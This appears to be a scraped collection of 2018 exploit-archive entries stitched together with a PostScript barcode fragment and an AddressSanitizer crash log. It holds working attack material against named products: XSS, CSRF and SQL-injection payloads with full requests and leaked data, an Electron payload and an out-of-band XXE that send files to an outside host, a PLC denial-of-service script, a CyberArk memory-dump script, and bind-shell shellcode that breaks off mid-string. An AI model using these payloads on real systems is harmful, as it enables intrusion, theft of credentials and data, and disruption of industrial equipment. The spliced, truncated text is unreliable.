[70.00 408.50 20.00 0.85] [75.00 410.50 15.00 0.85]
[75.00 414.50 15.00 0.85] [75.00 417.50 15.00 2.85]
[75.00 421.50 15.00 2.85] [75.00 424.50 15.00 0.85]
] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
% char xpos ypos fontsize
[(W) 32.00 10.00 12.00]
[(+) 48.00 10.00 0.00]
[(G) 64.00 10.00 0.00]
[($) 80.00 10.00 0.00]
[(A) 96.00 10.00 0.00]
[(+) 112.00 10.00 0.00]
[(M) 128.00 10.00 0.00]
[(%) 144.00 10.00 0.00]
[(K) 160.00 10.00 0.00]
[(W) 176.00 10.00 0.00]
[(W) 192.00 10.00 0.00]
[(G) 208.00 10.00 0.00]
[(W) 224.00 10.00 0.00]
[(W) 240.00 10.00 0.00]
[(W) 256.00 10.00 0.00]
[(W) 272.00 10.00 0.00]
[(W) 288.00 10.00 0.00]
[(W) 304.00 10.00 0.00]
[(W) 320.00 10.00 0.00]
[(W) 336.00 10.00 0.00]
[(9) 352.00 10.00 0.00]
[(W) 368.00 10.00 0.00]
[(W) 384.00 10.00 0.00]
] { {} forall dup 0.00 ne {
/Helvetica findfont exch scalefont setfont
} {pop} ifelse
moveto show} bind forall
% End barcode for "W+G$A+M%KWWGWWWWWWWW9WW"
showpage
%%Page: 2 2
=================================================================
==11076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000043bc02 at pc 0x00000042189a bp 0x7fff2f160c00 sp 0x7fff2f160bf0
READ of size 1 at 0x00000043bc02 thread T0
#0 0x421899 in Barcode_93_encode /home/lqwrm/research/barcode-0.99/code93.c:169
#1 0x409ac2 in Barcode_Encode_and_Print /home/lqwrm/research/barcode-0.99/library.c:234
#2 0x402319 in main /home/lqwrm/research/barcode-0.99/main.c:564
#3 0x7f9b8745282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#4 0x404708 in _start (/home/lqwrm/research/barcode-0.99/barcode+0x404708)
0x00000043bc02 is located 32 bytes to the right of global variable '*.LC6' defined in 'code93.c' (0x43bbe0) of size 2
'*.LC6' is ascii string '1'
0x00000043bc02 is located 30 bytes to the left of global variable 'CSWTCH.16' defined in 'code93.c:146:5' (0x43bc20) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow /home/lqwrm/research/barcode-0.99/code93.c:169 Barcode_93_encode
Shadow bytes around the buggy address:
0x00008007f730: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f750: 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
0x00008007f760: f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
0x00008007f770: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 02 f9 f9 f9
=>0x00008007f780:[f9]f9 f9 f9 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9
0x00008007f790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f7a0: 01 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x00008007f7b0: 00 00 00 00 00 00 00 00 01 f9 f9 f9 f9 f9 f9 f9
0x00008007f7c0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
0x00008007f7d0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==11076==ABORTING
# Exploit Title: MyBB ChangUonDyU Advanced Statistics Plugin v1.0.2 - Cross-Site Scripting
# Date: 5/25/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1125
# Version: 1.0.2
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-11532
1. Description:
This plugin displays advanced statistics on the index page such as latest posts with auto refresh using AJAX.
2. Proof of Concept:
Create a new thread with the following payload as the title <svg onload=alert('XSS')>
The alert will appear on the index page
3. Solution:
Update to the latest release
# Exploit Title: Facebook Clone Script 1.0.5 - Cross-Site Request Forgery
# Date: 2018-05-29
# Exploit Author: L0RD
# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
# Version: 1.0.5
# Tested on: Win 10
# Description :
# Facebook Clone Script 1.0.5 has csrf vulnerability which attacker can
# easily change user information .
# POC :
<html>
<head>
<title>Change information</title>
</head>
<body>
<form action="http://smsemailmarketing.in/demo/fbclone/setting.php" method="POST">
<input type="hidden" name="fn" value="anything" />
<input type="hidden" name="ln" value="anything" />
<input type="hidden" name="chnname" value="anything" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Exploit Title: Facebook Clone Script 1.0.5 - 'search' SQL Injection
# Date: 2018-05-29
# Exploit Author: L0RD
# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
# Version: 1.0.5
# Tested on: Win 10
# POC : SQLi :
# Parameter : search
# Type : Union based
# Payload :
1' UNION SELECT NULL,group_concat(table_name,0x3a,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()#
# Request
POST /demo/fbclone/top-search.php HTTP/1.1
Host: smsemailmarketing.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://smsemailmarketing.in/demo/fbclone/setting.php
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 231
Connection: keep-alive
search=1' UNION SELECT NULL,group_concat(table_name,0x3C62723E,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()#
# Response
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 29 May 2018 17:12:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 5370
<a href='friend-profile.php?id='><img src="images/unknown.jpeg"
height="40px"
width="40px">About_you:a_id,about_you:u_id,about_you:u_nick,about_you:u_nickname,about_you:u_nick_show,about_you:nick_privacy,admin:id,admin:name,admin:username,admin:password,admin:ref_password,admin:sex,admin:email_id,admin:valid_id,admin:user_type,admin:user_level,admin:city_code,admin:state_code,admin:country_code,admin:userimages,admin:description
</a></div>
# Exploit title: Yosoro 1.0.4 - Remote Code Execution
# Date: 2018-05-29
# Exploit Author: Carlo Pelliccioni
# Vendor homepage: https://yosoro.coolecho.net/
# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
# Version: 1.0.4
# Tested on: MacOS 10.13.4
# CVE: CVE-2018-11522
# _ _ _ _ _ ___ _ _
# | || | __ _ __ | |__| |_ (_)__ __ ___ / __| ___ __ _ _ _ _ (_)| |_ _ _
# | __ |/ _` |/ _|| / /| _|| |\ V // -_) \__ \/ -_)/ _|| || || '_|| || _|| || |
# |_||_|\__,_|\__||_\_\ \__||_| \_/ \___| |___/\___|\__| \_,_||_| |_| \__| \_, |
# Remote Code Execution (CVE-2018-11522)
# Payload:
<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>
# Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-30
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-300 CPU family: all versions.
# Tested on: Kali Linux
# CVE: CVE-2015-2177
#!/usr/bin/python
import socket
target_address="TargetIP"
target_port=80
buffer = "GET " + "\x42" * 2220 + " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
# Exploit Title: CSRF Privilege Escalation (Creation of an administrator
account) on SearchBlox 8.6.6
# Exploit Author: Canberk BOLAT, Ahmet GÜREL
# Software Link: https://www.searchblox.com/
# Version: < = SearchBlox Version 8.6.6
# Platform: Java
# Tested on: Windows
# CVE: CVE-2018-11538
# 1. DETAILS
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who
is currently authenticated with a web application to execute an unwanted
action. The attacker can trick the user into loading a page which may send
a request to perform the unwanted action in the background. In the case of
Searchblox, we can use CSRF to perform actions on the admin dashboard by
targeting an administrator.
# 2. PoC:
We assume that Searchblox is installed at http://localhost:8080/. Our
target is /searchblox/servlet/UserServlet u_name, u_passwd1, u_passwd2 and
role parameter which is the page used to create a new user. The given POC
will create a user on the website which has full administrator privileges.
HTTP Request:
GET
/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser
HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/searchblox/admin/main.jsp?menu1=adm
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Cookie: JSESSIONID=touluja8tpjc1iiwquoyiigfi;
Connection: close
Upgrade-Insecure-Requests: 1
Attack Vector:
<img src="
http://target:8080/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser"
width="0" height="0">
Vendor: Appnitro
Product webpage: https://www.machform.com/
Full-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/
Fix: https://www.machform.com/blog-machform-423-security-release/
Author: Amine Taouirsa
Twitter: @metalamin
Google dork examples:
----------------------
"machform" inurl:"view.php"
"machform" inurl:"embed.php"
Summary:
---------
The form creation platform MachForm from Appnitro is subject to SQL
injections that lead to path traversal and arbitrary file upload.
The application is widely deployed and with some google dorks it’s possible
to find various webpages storing sensitive data as credit card numbers with
corresponding security codes. Also, the arbitrary file upload can let an
attacker get control of the server by uploading a WebShell.
[1] SQL injection (CVE-2018-6410):
-------------------------
[1.1] Description:
The software is subject to SQL injections in the ‘download.php’ file.
[1.2] Parameters and statement:
This SQLi can be found on the parameter ‘q’ which a base64 encoded value
for the following parameters:
$form_id = $params['form_id'];
$id = $params['id'];
$field_name = $params['el'];
$file_hash = $params['hash'];
So the injectable parameters are ‘el’ and ‘form_id’ obtaining error-based,
stacked queries and time-based blind SQL injections. This is due to the
following vulnerable statement:
$query = "select {$field_name} from `".MF_TABLE_PREFIX."form_{$form_id}`
where id=?";
[1.3] POC
Proof of concept to get the first user mail:
http:// [URL] / [Machform_folder] /download.php?q=
ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy
MDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz
ZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io
UkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF
Ul9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=
Which is the base64 encoding for:
el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a) ;&id=1&hash=1&form_id=1
[2] Path traversal (CVE-2018-6409):
-----------------------------------
[2.1] Descrition
download.php’ is used to serve stored files from the forms answers.
Modifying the name of the file to serve on the corresponding ap_form table
leads to a path traversal vulnerability.
[2.2] POC
First we need to change the name for the element on the form:
update ap_form_58009 set element_4="../../../../../../.
./../../../../../../../../../etc/passwd" where id=1;
Now in order to be able to download it, we need to access:
http:// [URL] / [Machform_folder] /download.php?q=
ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0
NTgmZm9ybV9pZD01ODAwOQo=
Which is the base64 encoding for;
el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009
Note that hash is the MD5 of the corresponding filename:
md5("../../../../../../../../../../../../../../../../etc/passwd") =
402ba0230d6f44a2de590ac11107a458
[3] Bypass file upload filter (CVE-2018-6411):
----------------------------------------------
When the form is set to filter a blacklist, it automatically add dangerous
extensions to the filters.
If the filter is set to a whitelist, the dangerous extensions can be
bypassed.
This can be done directly on the database via SQLi
update ap_form_elements set element_file_type_list="php",
element_file_block_or_allow="a" where form_id=58009 and element_id=4;
Once uploaded the file can be found and executed in the following URL:
http:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]
The filename can be found in the database
SELECT element_4 FROM ap_form_58009 WHERE id=1;
# Exploit Title: SearchBlox 8.6.7 Out-Of-Band XML eXternal Entity (OOB-XXE)
# Exploit Author: Ahmet GUREL, Canberk BOLAT
# Software Link: https://www.searchblox.com/
# Version: < = SearchBlox Version 8.6.7
# Platform: Java
# Tested on: Windows
# CVE: CVE-2018-11586
# 1. DETAILS
An XML External Entity attack is a type of attack against an
application that parses XML input. This attack occurs when XML input
containing a reference to an external entity is processed by a weakly
configured XML parser. This attack may lead to the disclosure of
confidential data, denial of service, server side request forgery,
port scanning from the perspective of the machine where the parser is
located, and other system impacts. Reference:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
# 2. PoC:
XML external entity (XXE) vulnerability in /searchblox/api/rest/status in
SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary
files or conduct server-side request forgery (SSRF) attacks via a crafted
DTD in an XML request.
HTTP Request:
_____________
GET /searchblox/api/rest/status HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=n9uolja8nwkj15nsv66xjlzci;
XSRF-TOKEN=6098a021-0e3c-409f-9da0-b895eff3025d; AdsOnPage=5;
AdsOnSearchPage=5
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 140
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE xxe [
<!ENTITY % dtd SYSTEM "http://192.168.1.2:7000/ext.dtd">
%dtd;
%all;
%send;]>
#Ext.dtd File :
_______________
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.1.2:7000/?%file;
'>">
%all;
#HTTP Response:
_______________
Ahmets-MacBook-Pro:Desktop ahmet$ python -m SimpleHTTPServer 7000
Serving HTTP on 0.0.0.0 port 7000 ...
192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /ext.dtd HTTP/1.1" 200 -
192.168.1.2 - - [03/Jun/2018 15:37:16] "GET
/?;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files]%20[Mail]%20MAPI=1
HTTP/1.1" 200 -
# [CVE-2018-10094] Dolibarr SQL Injection vulnerability
## Description
Dolibarr is an "Open Source ERP & CRM for Business" used by many
companies worldwide.
It is available through [GitHub](https://github.com/Dolibarr/dolibarr)
or as distribution packages (e.g .deb package).
**Threat**
The application does not handle user input properly and allows execution
of arbitrary SQL commands on the database.
**Expectation**
Prepared queries should be used in order to avoid SQL injection in user
input.
## Vulnerability type
**CVE ID**: CVE-2018-10094
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-89
**CVSS Base Score**: 7.5
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
## Details
The database connector escapes quotes with the `real_escape_string()`
wrapper. However it is still possible to perform injection on integer
parameters without quotes.
```php
mysqli.class.php
/**
* Escape a string to insert data
*
* @param string $stringtoencode String to escape
* @return string String escaped
*/
function escape($stringtoencode)
{
return $this->db->real_escape_string($stringtoencode);
}
```
Additional checks are defined later, which forbit some SQL keywords (e.g
`union`, `create`, `insert`). However, by url encoding the payload,
these checks are bypassed.
```php
main.inc.php
/**
* Security: SQL Injection and XSS Injection (scripts) protection
(Filters on GET, POST, PHP_SELF).
*
* @param string $val Value
* @param string $type 1=GET, 0=POST, 2=PHP_SELF
* @return int >0 if there is an injection
*/
function test_sql_and_script_inject($val, $type)
{
$inj = 0;
// For SQL Injection (only GET are used to be included into bad
escaped SQL requests)
if ($type == 1)
{
$inj += preg_match('/updatexml\(/i', $val);
$inj += preg_match('/delete\s+from/i', $val);
$inj += preg_match('/create\s+table/i', $val);
$inj += preg_match('/insert\s+into/i', $val);
$inj += preg_match('/select\s+from/i', $val);
$inj += preg_match('/into\s+(outfile|dumpfile)/i', $val);
}
if ($type != 2) // Not common, we can check on POST
{
$inj += preg_match('/update.+set.+=/i', $val);
$inj += preg_match('/union.+select/i', $val);
$inj += preg_match('/(\.\.%2f)+/i', $val);
}
// For XSS Injection done by adding javascript with script
// This is all cases a browser consider text is javascript:
// When it found '<script', 'javascript:', '<style', 'onload\s=' on
body tag, '="&' on a tag size with old browsers
// All examples on page: http://ha.ckers.org/xss.html#XSScalc
// More on
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
$inj += preg_match('/<script/i', $val);
$inj += preg_match('/<iframe/i', $val);
$inj += preg_match('/Set\.constructor/i', $val); // ECMA script 6
if (! defined('NOSTYLECHECK')) $inj += preg_match('/<style/i', $val);
$inj += preg_match('/base[\s]+href/si', $val);
$inj += preg_match('/<.*onmouse/si', $val); // onmousexxx can
be set on img or any html tag like <img title='...' onmouseover=alert(1)>
$inj += preg_match('/onerror\s*=/i', $val); // onerror can be
set on img or any html tag like <img title='...' onerror = alert(1)>
$inj += preg_match('/onfocus\s*=/i', $val); // onfocus can be
set on input text html tag like <input type='text' value='...' onfocus =
alert(1)>
$inj += preg_match('/onload\s*=/i', $val); // onload can be
set on svg tag <svg/onload=alert(1)> or other tag like body <body
onload=alert(1)>
$inj += preg_match('/onclick\s*=/i', $val); // onclick can be
set on img text html tag like <img onclick = alert(1)>
$inj += preg_match('/onscroll\s*=/i', $val); // onscroll can be
on textarea
//$inj += preg_match('/on[A-Z][a-z]+\*=/', $val); // To lock event
handlers onAbort(), ...
$inj += preg_match('/:|:|:/i', $val); //
refused string ':' encoded (no reason to have it encoded) to lock
'javascript:...'
//if ($type == 1)
//{
$inj += preg_match('/javascript:/i', $val);
$inj += preg_match('/vbscript:/i', $val);
//}
// For XSS Injection done by adding javascript closing html tags
like with onmousemove, etc... (closing a src or href tag with not
cleaned param)
if ($type == 1) $inj += preg_match('/"/i', $val); // We
refused " in GET parameters value
if ($type == 2) $inj += preg_match('/[;"]/', $val); // PHP_SELF
is a file system path. It can contains spaces.
return $inj;
}
```
## Proof of Concept : retrieving the database name.
Payload:
```
1) union select
0,1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
Url-encoded payload:
%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
```
```http
GET
/dolibarr/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
HTTP/1.1
Host: dolibarr.lab:2080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie:
DOLSESSID_cac4a1e49e4040e845340fe919bd202b=qh3ot46kvm95ph0ddd3ujd7je5
Connection: close
Upgrade-Insecure-Requests: 1
...
</a>
</td>
<td>10.1.26-MariaDB-0+deb9u1</td>
<td>2</td>
<td></td>
<td>1</td>
<td>21</td>
<td class="nowrap">
```
## Affected versions
* Version 7.0.0 (last stable version as of March 2018) - previous
versions are probably also vulnerable but not tested
## Solution
Update to 7.0.2
([changelog](https://raw.githubusercontent.com/Dolibarr/dolibarr/develop/ChangeLog))
## Timeline (dd/mm/yyyy)
* 18/03/2018 : Initial discovery
* 17/04/2018 : Contact with the editor
* 17/04/2018 : Editor acknowledges the vulnerability
* 18/04/2018 : Editor announces fixes in version 7.0.2
* 21/05/2018 : Vulnerability disclosure
## Credits
* Issam RABHI (i dot rabhi at sysdream dot com)
* Kevin LOCATI (k dot locati at sysdream dot com)
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
# Exploit Title: CyberArk < 10 - Memory Disclosure
# Date: 2018-06-04
# Exploit Author: Thomas Zuk
# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
# Version: < 9.7 and < 10
# Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10
# CVE: CVE-2018-9842
# Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd
# paste the following bytes into a hexedited file named logon.bin:
#fffffffff7000000ffffffff3d0100005061636c695363726970745573657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020202020ffffffff0000000000000000000073000000cececece00000000000000000000000000000000303d4c6f676f6efd3131353d372e32302e39302e3238fd36393d50fd3131363d30fd3130303dfd3231373d59fd3231383d5041434c49fd3231393dfd3331373d30fd3335373d30fd32323d5061636c6953637269707455736572fd3336373d3330fd0000
#!/usr/bin/python
import socket
import os
import sys
ip = "10.107.32.21"
port = 1858
# Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services.
# The below is a sample login request that is needed to receive the memory
pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00"
for iteration in range(0, 110):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(pacli_logon)
# recieve response
s.recv(200)
reply = s.recv(1500)
# write responses to file
file = open("cyberark_memory", "a")
file.write("received: \n")
file.write(reply)
file.write("\n\n\n")
file.close()
s.close()
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : Zip-n-Go v4.9 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://mc1soft.com/index.shtml #
# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#
# Disclosure Timeline:
# ====================
# 05-28-18: Contacted vendor, no response
# 05-30-18: Contacted vendor again, responded with patch and requested further testing
# 05-30-18: Patch did not seem to fix the problem and alternative approach were suggested
# 05-31-18: Vendor applied new patch and requested further testing
# 05-31-18: The new patch nullified the vulnerability
# 06-03-18: Version 4.95 was released
# 06-03-18: Proof of concept exploit published
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
#Payload size: 710 bytes
shellcode = ""
shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6e\x62\x43\x30"
shellcode += "\x45\x50\x73\x30\x61\x70\x6d\x59\x7a\x45\x46\x51"
shellcode += "\x39\x50\x72\x44\x4e\x6b\x52\x70\x30\x30\x6c\x4b"
shellcode += "\x52\x72\x56\x6c\x6c\x4b\x73\x62\x37\x64\x4c\x4b"
shellcode += "\x32\x52\x51\x38\x54\x4f\x6f\x47\x31\x5a\x61\x36"
shellcode += "\x50\x31\x79\x6f\x4c\x6c\x35\x6c\x31\x71\x51\x6c"
shellcode += "\x47\x72\x46\x4c\x71\x30\x59\x51\x5a\x6f\x44\x4d"
shellcode += "\x56\x61\x6b\x77\x38\x62\x69\x62\x72\x72\x43\x67"
shellcode += "\x6e\x6b\x43\x62\x32\x30\x6c\x4b\x33\x7a\x55\x6c"
shellcode += "\x6c\x4b\x32\x6c\x34\x51\x34\x38\x6d\x33\x37\x38"
shellcode += "\x57\x71\x4a\x71\x66\x31\x6c\x4b\x42\x79\x51\x30"
shellcode += "\x65\x51\x59\x43\x4c\x4b\x52\x69\x45\x48\x6b\x53"
shellcode += "\x77\x4a\x47\x39\x4e\x6b\x76\x54\x4e\x6b\x46\x61"
shellcode += "\x58\x56\x36\x51\x59\x6f\x6e\x4c\x49\x51\x4a\x6f"
shellcode += "\x76\x6d\x35\x51\x68\x47\x57\x48\x49\x70\x62\x55"
shellcode += "\x48\x76\x56\x63\x31\x6d\x4a\x58\x55\x6b\x73\x4d"
shellcode += "\x35\x74\x33\x45\x4b\x54\x52\x78\x6c\x4b\x46\x38"
shellcode += "\x51\x34\x56\x61\x59\x43\x33\x56\x6c\x4b\x76\x6c"
shellcode += "\x50\x4b\x4e\x6b\x46\x38\x75\x4c\x67\x71\x68\x53"
shellcode += "\x6c\x4b\x34\x44\x4e\x6b\x47\x71\x78\x50\x4b\x39"
shellcode += "\x47\x34\x57\x54\x55\x74\x33\x6b\x33\x6b\x55\x31"
shellcode += "\x31\x49\x50\x5a\x42\x71\x4b\x4f\x4b\x50\x31\x4f"
shellcode += "\x31\x4f\x72\x7a\x4c\x4b\x54\x52\x6a\x4b\x6c\x4d"
shellcode += "\x31\x4d\x62\x48\x46\x53\x50\x32\x77\x70\x43\x30"
shellcode += "\x72\x48\x70\x77\x30\x73\x35\x62\x43\x6f\x50\x54"
shellcode += "\x70\x68\x72\x6c\x71\x67\x67\x56\x47\x77\x49\x6f"
shellcode += "\x68\x55\x6e\x58\x4c\x50\x43\x31\x45\x50\x53\x30"
shellcode += "\x46\x49\x78\x44\x33\x64\x62\x70\x50\x68\x76\x49"
shellcode += "\x4f\x70\x42\x4b\x43\x30\x69\x6f\x69\x45\x73\x5a"
shellcode += "\x67\x78\x31\x49\x42\x70\x6a\x42\x59\x6d\x71\x50"
shellcode += "\x32\x70\x73\x70\x36\x30\x70\x68\x78\x6a\x36\x6f"
